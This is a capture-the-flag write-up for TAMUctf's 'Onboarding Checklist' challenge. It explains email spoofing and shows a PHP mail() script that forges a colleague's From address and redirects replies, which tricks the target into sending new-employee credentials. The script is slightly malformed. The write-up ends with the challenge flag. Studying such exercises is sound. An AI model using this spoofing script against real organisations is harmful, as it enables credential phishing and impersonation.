[MISC] TAMUctf - Onboarding Checklist

Onboarding Checklist

From: importantperson@somebigcorp.com
Date: Feb 22, 2019 9:00 AM
To: someguy@somebigcorp.com
Subject: New Employee Access

Hello Some Guy,
We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to tamuctf@gmail.com so they can process the account request?
Thank you,
Important Person

The new employee can be a little slow to respond.

Difficulty: easy

2/26 8:42 am CST: Visting somebigcorp.com is not part of the challenge

The goal of this challenge is clear. Send an email to tamuctf@gmail.com requesting the credentials for the new employee. Although … we need to be disguised as someguy@somebigcorp.com in order to request the credentials. How?

*Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.*

To use this technique there is a perfect PHP function called mail(). All we need is a PHP server and an email server (check it up how to setup one on google if you don’t know how to do it)

mail ( string $to , string $subject , string $message [, [mixed] $additional_headers [, string $
additional_parameters ]] ) : bool

The most important parameters in this case are: From and Reply-To in the additional headers section. In the From argument we put the email we want to spoof and in the Reply-To we chose the email where we want the people that we fooled to send the replies, in this case we want to fool tamuctf@gmail.com.

So to retrieve the flag all we need is:

  • PHP Server
  • Email Server
  • An email where we can receive the credentials (let’s call it examplemail@10minutemail.com)
  • Call the PHP mail() function from the server.
  • Put the email where we want to receive the info into the body of the mail()’s message

Let’s create the file imnotspoofing.php with the following content


$to= 'tamuctf@gmail.com';
$subject = 'Requesting new employee credentials';
$message= 'Hello. I am request the new employee credentials. Can you send them to my email examplemail@10minutemail.com. Thanks'
$headers = array(
'From: someguy@somebigcorp.com',
'Reply-To: examplemail@10minutemail.com',
'X_Mailer: PHP/' . phpversion()
mail($to, $subject, $message, implode("\n", $headers));


Shortly after we running this PHP snippet from our server, we’ll receive an email in our examplemail@10minutemail.com with the flag:

FLAG: gigem{wuT_4n_31337_sp0ofer_494C4F5645594F55}